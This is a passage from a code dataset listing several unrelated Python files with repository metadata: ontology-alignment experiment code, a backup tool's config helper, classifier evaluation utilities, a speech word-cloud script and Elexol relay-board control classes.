dir_path=args.dataset_dir + \"/\" + args.reference_alignments_dir)\n\n\t\tpair_ontology_performance, complete_experiment_output_dict_step_wise = try_many_queries_separately_among_two_agents(args, ont_prefixes=prefix_pair_tuple,\n\t\t\t\t\tquery_mappings=equivalent_classes, teacher_policy=teacher_policy,\tstudent_policy=student_policy,\n\t\t\t\t\t\t\t\t\t\texp_dir=exp_dir, complete_experiment_output_dict_step_wise=complete_experiment_output_dict_step_wise)\n\n\t\tkeys_to_append_list = [\"completed\", \"precision\", \"recall\", \"total_steps\", \"query_result_size\", \"episode_generation_deadend\",\n\t\t\t\t\t\t\t \"perfect_score\", \"teachers_ep_mem_size\", \"students_ep_mem_size\", \"teachers_sem_mem_size\", \"students_sem_mem_size\"]\n\t\tappend_to_list_from_one_dictionary_to_other(source_dict=pair_ontology_performance, target_dict=ontology_pair_performances_dict,\n\t\t\t\t\t\t\t\t\t\t\t\t\tkeys_to_append_list=keys_to_append_list)\n\n\n\tend_t = datetime.datetime.now()\n\ttime_delta = end_t - start_t\n\tminutes = time_delta.total_seconds() / 60\n\n\tav_performance_stats_dict, std_performance_stats_dict = aggregate_statistics_of_dictionary_of_list_of_values(ontology_pair_performances_dict)\n\n\tperformance_summary_str = format_average_query_performance_in_str(av_performance_stats_dict, std_performance_stats_dict, is_single_query=False)\n\n\taverage_values_per_step, _ = write_average_query_performance_to_tensorboard(experiment_average_tensorboard_writer, complete_experiment_output_dict_step_wise, args.max_steps, args.eval_every)\n\n\twith open(os.path.join(exp_dir, \"0_Summary.txt\"), \"w\") as complete_experiments_file:\n\t\tcomplete_experiments_file.write(performance_summary_str)\n\t\tcomplete_experiments_file.write(f\"Experiment duration: {minutes:06.2} minutes.\\n\\n\\n\")\n\n\twith open(os.path.join(exp_dir,'av_stats_per_step_dict.pickle'), 'wb') as handle:\n\t\tpickle.dump(average_values_per_step, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\tav_precision = av_performance_stats_dict[\"precision\"]\n\tav_recall = av_performance_stats_dict[\"recall\"]\n\tav_total_steps = av_performance_stats_dict[\"total_steps\"]\n\tav_teacher_ep_mem = av_performance_stats_dict[\"teachers_ep_mem_size\"]\n\tav_student_ep_mem = av_performance_stats_dict[\"students_ep_mem_size\"]\n\tav_student_sem_mem = av_performance_stats_dict[\"students_sem_mem_size\"]\n\n\n\tprint(f\"Task (Query) Performance Metrics:\\nPrecision: {av_precision:04.2}, Recall: {av_recall:04.2}\")\n\tprint(f\"Efficiency Metrics:\\nInteraction time (#Examples): {av_total_steps:04.2}, Teacher Episodic Memory: {av_teacher_ep_mem:04.2}, Student Episodic Memory: {av_student_ep_mem:04.2}, Student Working Memory: {av_student_sem_mem:04.2}\")\n\n\n", "repo_name": "kondilidisn/shared_query_understanding", "sub_path": "experiments.py", "file_name": "experiments.py", "file_ext": "py", "file_size_in_byte": 20517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 252, "usage_type": "call"}, {"api_name": "os.path", "line_number": 252, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 253, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path", "line_number": 263, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 283, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 328, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 330, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 339, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 340, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 344, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 344, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 363, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 363, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path", "line_number": 373, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 377, "usage_type": "call"}, {"api_name": "os.path", "line_number": 377, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 378, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "25215606921", "text": "import os\nimport logging\nimport ConfigParser\n\nEXCLUDED_BY_FILE_FILTER = 'file-filter'\nEXCLUDED_BY_LOCAL_METADATA = 'local-metadata'\nFLAG_FILE_CHANGED_WHILE_UPLOADING = 'file-changed'\n\n\nclass Context(dict):\n \"\"\"Context to share state between all the components\"\"\"\n\n def __init__(self, config=None):\n self.log = {}\n self.excluded_count = 0\n self.included_count = 0\n self.error_count = 0\n self.include_extensions = []\n self.exclude_extensions = []\n self.config = config or get_config()\n self.dry_run = False\n\n def add_log(self, directory, filename, **kwargs):\n self.log[directory] = self.log.get(directory, dict())\n self.log[directory][filename] = self.log[directory].get(filename, dict())\n self.log[directory][filename].update(**kwargs)\n\n def add_excluded(self, directory, filename, reason):\n self.add_log(directory, filename, excluded=True,\n excluded_reason=reason)\n self.excluded_count += 1\n\n def add_included(self, directory, filename):\n self.add_log(directory, filename, included=True)\n self.included_count += 1\n\n def add_error(self, directory, filename, error_type, error_message):\n self.add_log(directory, filename, error=True, error_type=error_type,\n error_message=error_message)\n self.error_count += 1\n\n def set_include_extensions(self, extensions):\n assert isinstance(extensions, (list, tuple))\n self.include_extensions = [tmp.lower() for tmp in extensions]\n\n def set_exclude_extensions(self, extensions):\n assert isinstance(extensions, (list, tuple))\n self.exclude_extensions = [tmp.lower() for tmp in extensions]\n\n def get_log_processed(self):\n # self.log = {\n # '/path/to/directory': {\n # '.frockup.gdbm': {\n # 'excluded': True,\n # 'excluded_reason': 'file-filter'\n # },\n # 'fome-file.txt': {\n # 'excluded': True,\n # 'excluded_reason': 'local-metadata'\n # },\n # 'some-other-file.txt': {\n # 'excluded': True,\n # 'excluded_reason': 'local-metadata'\n # },\n # }\n # }\n excluded = []\n included = []\n for directory, entries in self.log.iteritems():\n for filename, stat_dict in entries.iteritems():\n if stat_dict.get('included', False):\n included.append([directory, filename])\n elif stat_dict.get('excluded', False):\n excluded.append([directory, filename])\n return included, excluded\n\n\ndef get_config(filename=None):\n \"\"\"Loads configuration and returns instance of ConfigParser\"\"\"\n config_file = os.path.expanduser(filename or '~/.frockup/frockup.conf')\n logging.debug(\"Loading config from %s\", config_file)\n assert os.path.exists(config_file), \\\n \"The configuration file {0} does not exists\".format(config_file)\n assert os.path.isfile(config_file), \\\n \"The configuration {0} is not a regular file\".format(config_file)\n config = ConfigParser.ConfigParser()\n config.read(config_file)\n return config\n", "repo_name": "hgdeoro/frockup", "sub_path": "frockup/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "33822299574", "text": "import pandas as pd\nimport numpy as np\nfrom joblib import dump, load\nfrom sklearn import metrics\nimport time\n\n\ndef model_save (model, model_name):\n file_name = model_name+'.joblib'\n dump(model, file_name)\n \ndef model_load (model_name):\n file_name = model_name+'.joblib'\n\n return load(file_name)\n\n\ndef plot_confidence_interval_for_data (model, X):\n \"\"\"\n Pass 10 - 15 datapoints for better visualization. \n This function plots the confidence interval of predictive value for the provided datapoints\n\n Parameters:\n -----------\n model : model that is built\n X : datapoints for evaluation\n\n Returns:\n --------\n Plot\n\n \"\"\"\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()\n\n\ndef plot_confidence_interval_for_variable (model, X, y, variable):\n \"\"\"\n This function plots the confidence interval of predictive value for the provided variable\n\n Parameters:\n -----------\n model : model that is built\n X : datapoints \n y : actual value\n variable : variable for evaluation\n\n Returns:\n --------\n Plot\n\n \"\"\"\n\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n X_ds_new = X.copy()\n X_ds_new['actual'] = y\n X_ds_new['pred'] = np.mean(preds, axis=1)\n X_ds_new['pred_std'] = np.std(preds, axis=1)\n\n X_ds_grp = X_ds_new.groupby(variable)['actual', 'pred', 'pred_std'].agg('mean')\n X_ds_grp['count'] = X_ds_new[variable].value_counts()\n\n print (f'Average Predicted value and Std Dev by : {variable}')\n display(X_ds_grp)\n print ('')\n print (f'Distribution of Predicted value by : {variable}')\n sns.catplot(x=variable, y='pred', data=X_ds_new, kind='box')\n plt.show()\n\n\ndef threshold_evaluation(y_true, y_prob, start=0, end=1, step_size=0.1):\n \"\"\"\n This function produces various model evaluation metrics at various values of threshold. \n The values of threshold are customizable using parameters 'start', 'end', 'nsteps'\n\n Parameters:\n -----------\n y_true : 'array', actual value of y (this could be y_train, y_valid, or y_test)\n y_prob : 'array', predicted value of y (this could be from train, valid or test)\n start : 'int', default = 0. starting point for threshold values\n end : 'int', default = 1. End point for threshold values\n step_size : 'float', default = 0.1 | Step size for incrementing the threshold values\n\n Returns:\n --------\n df : 'dataframe', dataframe with various model evaluation metrics \n \"\"\"\n threshold_list = np.arange(start,end,step_size)\n result = []\n \n for t in threshold_list:\n y_pred = (y_prob>=t).astype(int)\n tn = metrics.confusion_matrix(y_true, y_pred)[0][0]\n fp = metrics.confusion_matrix(y_true, y_pred)[0][1]\n fn = metrics.confusion_matrix(y_true, y_pred)[1][0]\n tp = metrics.confusion_matrix(y_true, y_pred)[1][1]\n\n accuracy_scr = metrics.accuracy_score(y_true, y_pred)\n precision_scr = metrics.precision_score(y_true, y_pred)\n recall_scr = metrics.recall_score(y_true, y_pred)\n f1_scr = metrics.f1_score(y_true, y_pred)\n roc_auc_scr = metrics.roc_auc_score(y_true, y_pred)\n\n result.append((t, tp, fp, tn, fn, accuracy_scr, precision_scr, recall_scr, f1_scr, roc_auc_scr))\n \n result_df = pd.DataFrame(result)\n result_df.columns = ['Threshold','TP', 'FP', 'TN', 'FN' , 'Accuracy Score', 'Precision Score', \n 'Recall Score', 'F1 Score', 'ROC AUC Score']\n return result_df\n\ndef metrics_evaluation(y_true, y_prob, threshold, df_type='train'):\n \"\"\"\n This function produces various model evaluation metrics at various values of threshold. \n The values of threshold are customizable using parameters 'start', 'end', 'nsteps'\n\n Parameters:\n -----------\n y_true : 'array', actual value of y (this could be y_train, y_valid, or y_test)\n y_prob : 'array', predicted value of y (this could be from train, valid or test)\n threshold : 'float', threshold value at which predicted probability needs to be converted to predictions\n df_type : 'str', Usual values are 'train', 'valid, 'test'\n\n Returns:\n --------\n result : 'list', list with various model evaluation metrics \n \"\"\"\n\n y_pred = (y_prob>=threshold).astype(int)\n \n tn = metrics.confusion_matrix(y_true, y_pred)[0][0]\n fp = metrics.confusion_matrix(y_true, y_pred)[0][1]\n fn = metrics.confusion_matrix(y_true, y_pred)[1][0]\n tp = metrics.confusion_matrix(y_true, y_pred)[1][1]\n\n accuracy_scr = metrics.accuracy_score(y_true, y_pred)\n precision_scr = metrics.precision_score(y_true, y_pred)\n recall_scr = metrics.recall_score(y_true, y_pred)\n f1_scr = metrics.f1_score(y_true, y_pred)\n roc_auc_scr = metrics.roc_auc_score(y_true, y_pred)\n\n result = {'Dataset': df_type, 'No obs': len(y_true), 'Threshold': threshold,\n 'TP':tp, 'FP': fp, 'TN': tn, 'FN':fn , \n 'Accuracy Score':accuracy_scr, 'Precision Score':precision_scr, \n 'Recall Score':recall_scr, 'F1 Score':f1_scr, 'ROC AUC Score':roc_auc_scr}\n\n return result\n\ndef execute_model(model, model_name, X_train, y_train, X_valid, y_valid, X_test, y_test, eval_metrics='ROC AUC Score'):\n model_results = []\n start = time.perf_counter()\n #Training\n model.fit(X_train, y_train)\n \n #Predict\n y_train_prob = model.predict_proba(X_train)[:,1]\n y_valid_prob = model.predict_proba(X_valid)[:,1]\n y_test_prob = model.predict_proba(X_test)[:,1]\n \n #Calculate threshold\n valid_result_df = threshold_evaluation(y_true=y_valid, y_prob=y_valid_prob, start=0, end=1, step_size=.05)\n id_max = valid_result_df[eval_metrics].idxmax()\n threshold = valid_result_df.loc[id_max, 'Threshold']\n\n end = time.perf_counter()\n run_time= round(end-start, 2)\n\n train_res = metrics_evaluation(y_true=y_train, y_prob=y_train_prob, threshold=threshold, df_type='train')\n train_res['Algorithm'] = model_name\n train_res['Run Time'] = run_time\n model_results.append(train_res)\n\n valid_res = metrics_evaluation(y_true=y_valid, y_prob=y_valid_prob, threshold=threshold, df_type='valid')\n valid_res['Algorithm'] = model_name\n valid_res['Run Time'] = run_time\n model_results.append(valid_res)\n\n test_res= metrics_evaluation(y_true=y_test, y_prob=y_test_prob, threshold=threshold, df_type='test')\n test_res['Algorithm'] = model_name\n test_res['Run Time'] = run_time\n model_results.append(test_res)\n\n #print(model_results)\n model_results_df = pd.DataFrame(model_results)\n model_results_df = model_results_df[['Algorithm', 'Run Time', 'Dataset', 'No obs', 'Threshold',\n 'TP', 'FP', 'TN', 'FN' , 'Accuracy Score', 'Precision Score', \n 'Recall Score', 'F1 Score', 'ROC AUC Score']]\n return model_results_df\n", "repo_name": "samarth-agrawal-86/fast_ml", "sub_path": "fast_ml/model_evaluation.py", "file_name": "model_evaluation.py", "file_ext": "py", "file_size_in_byte": 7650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "joblib.dump", "line_number": 10, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 107, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 108, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 109, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 110, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 112, "usage_type": "name"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 114, "usage_type": "name"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 116, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 145, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 145, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 146, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 147, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 149, "usage_type": "name"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 152, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 153, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 164, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "17232959418", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport numpy as np\nfrom wordcloud import WordCloud\n\n# Charger les données\ndata = pd.read_excel(\"Discours.xlsm\")\n\n# Extraire les mots et leur fréquence pour Obama\nwords_obama = data[\"wordsObama\"]\nfrequency_obama = data[\"Obama\"]\n\n# Créer un graphique en barres des mots les plus fréquents pour Obama\nplt.bar(words_obama[:10], frequency_obama[:10])\nplt.xlabel(\"Mots\")\nplt.ylabel(\"Fréquence\")\nplt.title(\"Mots les plus fréquents - Obama\")\nplt.xticks(rotation=45)\nplt.show()\n\n\n# Extraire les mots et leur fréquence pour Trump\nwords_trump = data[\"wordsTrump\"]\nfrequency_trump = data[\"Trump\"]\n\n# Créer un graphique en barres des mots les plus fréquents pour Trump\nplt.bar(words_trump[:10], frequency_trump[:10])\nplt.xlabel(\"Mots\")\nplt.ylabel(\"Fréquence\")\nplt.title(\"Mots les plus fréquents - Trump\")\nplt.xticks(rotation=45)\nplt.show()\n\n\n# Filtrer les données pour exclure les valeurs booléennes\nfiltered_words_obama = words_obama[data[\"Obama\"].astype(bool)]\n\n# Concaténer les mots filtrés en une seule chaîne de caractères\ntext_obama = ' '.join([word for word in filtered_words_obama])\n\n# Créer un nuage de mots pour Obama\nwordcloud_obama = WordCloud(width=800, height=400).generate(text_obama)\n\n# Afficher le nuage de mots pour Obama\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud_obama, interpolation='bilinear')\nplt.axis('off')\nplt.title(\"Nuage de mots - Obama\")\nplt.show()\n\n\n# Supprimer les lignes avec des valeurs manquantes dans les colonnes \"wordsObama\" et \"Obama\"\ndata_cleaned = data.dropna(subset=[\"wordsTrump\", \"Trump\"])\n\n# Concaténer les mots et leur fréquence pour Obama en une seule chaîne de caractères\ntext_trump = ' '.join([word for word in data_cleaned[\"wordsTrump\"]])\n\n# Créer un nuage de mots pour Obama\nwordcloud_trump = WordCloud(width=800, height=400).generate(text_trump)\n\n# Afficher le nuage de mots pour Obama\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud_trump, interpolation='bilinear')\nplt.axis('off')\nplt.title(\"Nuage de mots - Trump\")\nplt.show()", "repo_name": "ktiass/sudoku", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_excel", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "12024312347", "text": "import serial\nimport sys\n\nsys.path.append(\"..\\modules\")\nimport elexol\n\n\nclass elexol_board(object):\n def __init__(self,port=1):\n #******************************************************\n #****** set up elexol serial port *********************\n self.USB_ser = serial.Serial(timeout = 3, writeTimeout = 3)\n self.USB_ser.port = int(port)-1\n self.USB_ser.open()\n #******************************************************\n\n\n #******************************************************\n #***** create and initialize the serial port device ***\n self.relays = elexol.Elexol(self.USB_ser)\n self.relays.configure_output_ports('A','B','C')\n self.relays.write_byte_to_portA(0)\n self.relays.write_byte_to_portB(0)\n self.relays.write_byte_to_portC(0)\n #******************************************************\n\n def all_NC(self):\n \"\"\"switch all relays to normally closed state)\n \"\"\"\n self.port_NC(port='A')\n self.port_NC(port='B')\n self.port_NC(port='C')\n\n def all_NO(self):\n \"\"\"switch all relays to normally open state)\n \"\"\"\n self.port_NO(port='A')\n self.port_NO(port='B')\n self.port_NO(port='C')\n\n def port_NC(self,port='A'):\n \"\"\"switch all relays on the given port to normally closed state)\n \"\"\"\n if port in ['a','A']:\n self.relays.write_byte_to_portA(0)\n if port in ['b','B']:\n self.relays.write_byte_to_portB(0)\n if port in ['c','C']:\n self.relays.write_byte_to_portC(0)\n\n def port_NO(self,port='A'):\n \"\"\"switch all relays on the given port to normally open state)\n \"\"\"\n if port in ['a','A']:\n self.relays.write_byte_to_portA(0xFF)\n if port in ['b','B']:\n self.relays.write_byte_to_portB(0xFF)\n if port in ['c','C']:\n self.relays.write_byte_to_portC(0xFF)\n\n def close_serial_port(self):\n self.USB_ser.close()\n\n\nclass relay(object):\n def __init__(self,board,port='A',relay_num=1):\n \"\"\"find the desired relay from the port number(A,B,or C) and relay number(1-8)\n \"\"\"\n self.elexol_DIO = board\n\n if port not in['a','A','b','B','c','C']:\n raise RuntimeError(\"invalid port number given (A-C only)\")\n elif relay_num not in range(1,9):\n raise RuntimeError(\"invalid relay number given (0-23 only)\")\n\n self.relay_id = self.find_relay_id(port,relay_num)\n\n def find_relay_id(self,port, relay_num):\n \"\"\"get the I/O pin number (0-23) for the desired relay\n \"\"\"\n if port in ['a','A']:\n return relay_num - 1\n\n elif port in ['b','B']:\n return relay_num + 7\n\n elif port in ['c','C']:\n return relay_num + 15\n\n def select_NC(self):\n \"\"\"select the normally closed relay position\n \"\"\"\n self.elexol_DIO.relays.clear_bit(self.relay_id)\n\n def select_NO(self):\n \"\"\"select the normally open relay position\n \"\"\"\n self.elexol_DIO.relays.set_bit(self.relay_id)\n\nclass ecg_mux(object):\n def __init__(self,board,port='A'):\n \"\"\"\n \"\"\"\n self.elexol_DIO = board\n\n if port not in['a','A','b','B','c','C']:\n raise RuntimeError(\"invalid port number given (A-C only)\")\n else:\n self.port = port\n\n #define all of the relays\n self.DAC_0_SA = relay(self.elexol_DIO,self.port,8)\n self.DAC_1_SA = relay(self.elexol_DIO,self.port,7)\n self.DAC_0_SB = relay(self.elexol_DIO,self.port,6)\n self.DAC_1_SB = relay(self.elexol_DIO,self.port,5)\n self.DAC_0_HVA = relay(self.elexol_DIO,self.port,4)\n self.DAC_1_HVA = relay(self.elexol_DIO,self.port,3)\n self.DAC_0_HVB = relay(self.elexol_DIO,self.port,2)\n self.DAC_1_HVB = relay(self.elexol_DIO,self.port,1)\n\n def SB_SA(self):\n \"\"\"connect the NI analog output DAC0OUT to SENSEB, DAC1OUT to SENSEA\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_SB.select_NO()\n self.DAC_1_SA.select_NO()\n\n def SA_SB(self):\n \"\"\"connect the NI analog output DAC0OUT to SENSEA, DAC1OUT to SENSEB\n \"\"\"\n self.elexol_DIO.port_NC(self.port)\n self.DAC_0_SA.select_NO()\n self.DAC_1_SB.select_NO()\n\n def HVB_SA(self):\n \"\"\"connect the NI analog output DAC0OUT to HVB, DAC1OUT to SENSEA\n 